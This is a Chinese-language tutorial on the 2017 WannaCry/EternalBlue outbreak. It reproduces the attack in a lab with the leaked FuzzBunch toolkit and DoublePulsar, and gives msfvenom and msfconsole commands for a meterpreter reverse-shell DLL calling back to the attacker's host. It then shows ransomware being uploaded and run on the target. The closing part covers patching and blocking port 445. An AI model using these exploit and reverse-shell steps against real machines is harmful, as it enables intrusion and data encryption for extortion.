比特币病毒让你WannaCry?其实防御很简单
17年5月13日,不法分子利用NSA黑客武器库泄露的「永恒之蓝」发起比特币病毒攻击事件。「永恒之蓝」会扫描开放445文件共享埠的Windows机器,植入勒索软体。由于以前国内多次爆发利用445埠传播的蠕虫,运营商已对个人用户封掉445埠,但教育网还没有此限制,所以教育网是受攻击的重灾区!我们针对此病毒,解密其制造过程。
注:此报告仅为科学研究,乱造病毒可不是闹著玩。根据中华人民共和国刑法第二百八十六条 违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。
永恒之蓝工具分析报告
环境
攻击机1Win7 32位 专业版SP1192.168.61.133
攻击机2 kali2192.168.61.128
靶机win7 64位 旗舰版SP1192.168.61.129
实验准备
攻击机1安装
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win32-py2.6.exe
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
下载方程式工具包并解压
开启靶机,靶机可以不关防火墙,甚至可以安装杀毒软体,但不能打上对应补丁
实验步骤
攻击机1进入工具目录,运行fb.py
输入靶机IP 192.168.61.129
输入攻击者IP 192.168.61.133
No 不启动重定向
No 不需要开启日志
4 创建新工程
Uenit_test 输入工程名
Use Eternalblue
然后是一路回车,因为全是默认配置
确认一下启动
由于启用了fuzzbunch扩展,失败了会自动多次尝试,有时候是一次就成功。
然后是另一个攻击模块的配合使用Doublepulsar
同样的全回车
直到选系统选择64位的
选择攻击方式选运行dll
接下去要选择dll路径,然而我们还没有,就先放一边
开启攻击机2 kali,用来生成dll
msfvenom -p
windows/x64/meterpreter/reverse_tcp LHOST=192.168.61.128 LPORT=9999 -f dll >/root/桌面/uenit_attack.dll桌面目录下多了一个uenit_attack.dll,将其拷贝到攻击机1目录下然后开启监听
msfconsole
msf > use
exploit/multi/handler
msf > set
LHOST 192.168.61.128msf > set
LPORT 9999msf > set
PAYLOAD windows/x64/meterpreter/reverse_tcpmsf > exploit
再回到攻击机1,已经将之前kali上的uenit_attack.dll拷贝到c:根目录下
然后输入dllpayload地址为 C:\uenit_attack.dll
再一路回车
确认后开始
成功以后返回kali查看,已近反弹回shell了。
Ipconfig
Dir
可以看到当前目录在c:windowssystem32
我们在当前创建一个目录并进入
然后上传我们的exe,比如勒索软体
在靶机上的对于目录里,我们发现了上传上去的可执行程序
如下是当前靶机的界面
在攻击机中运行刚才上传的勒索软体
跳出了勒索软体界面
并且发现勒索软体加密了所有文档和图片,以及修改了壁纸。
防御方法
360nsa工具防御
然后就被要求安装360安全卫士,接著就是打补丁,打上补丁一切就安全了
也可以自行打上微软补丁
https://technet.microsoft.com/zh-cn/library/security/MS17-010下载自己对应版本的补丁即可,查看自己系统版本,可在「我的电脑」或「计算机」上右键—属性即可
也有小伙伴希望自食其力,自己关闭埠
在开始菜单中选择「运行」或者win+r同时按呼出「运行」
输入gpedit.Msc呼出本地策略组编辑器
双击计算机配置
Windows设置
安全设置
IP安全策略
右键空白处,选择创建IP策略
根据指示点击下一步
为策略命名后点击下一步
点击添加规则
为规则命名后点击添加
目标地址下拉选择「我的IP地址」,点击协议
协议下拉选择TCP,选择到此埠选择,填写445。
点击确定返回IP筛选器列表
点击确定返回新规则属性,点选关闭445这一规则
切换到筛选器操作栏目
点击添加操作
点选阻止
在常规选项卡可以给这一操作命名,然后点确定
在这一策略上右键点击选择「分配」
我们验证下这一方法是否可行,再次用Eterblue工具攻击,得到
证实关闭445埠起作用了,一条关闭从外界到445埠数据的链路就被完全阻断了,为了防止nsa更多工具的攻击,需要关闭的埠还有135、137、138、139。
结语
目前,网路安全问题日益突出,勒索病毒也并不是首次出现,但是只要我们提高网路安全意识,及时打上系统补丁,注意杀毒软体的推送补丁,就能防范于未然。
推荐阅读: